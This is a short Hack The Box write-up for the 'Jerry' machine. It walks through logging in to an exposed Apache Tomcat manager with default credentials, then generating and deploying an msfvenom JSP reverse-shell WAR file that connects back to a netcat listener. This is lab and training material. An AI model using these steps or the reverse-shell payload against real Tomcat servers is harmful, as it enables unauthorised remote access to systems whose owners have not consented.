Hack The Box Jerry Write-Up

Akash c
2 min readNov 19, 2018




Nmap reveals that port number 8080 is open, let’s visit the port number 8080 in web browser.

Apache Tomcat/7.0.88
Basic access authentication

To access Tomcat manger we need a valid Username and Password, When we enter any invalid Username and Password we will get a 403 Access Denied message.

403 Acess Denied

Let’s try the Username : tomacat and password : s3cret

Once we successfully authenticate were brought to the Tomcat Web Application . The Tomcat manager has an option to upload .war files to the server.

Tomcat Web Application Manager


We can use msfvenom to generate a java payload for reverse shell with .war extension

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war > cmd.war

Upload and Deploy the reverse shell then visit

Let’s open a netcat Listener to get the shell which will be generated after our cmd.war file gets executed.

The Flag is located in


The user and root flags are written in 2 for the price of 1.txt file and it can be read using type command.

type "2 for the price of 1.txt"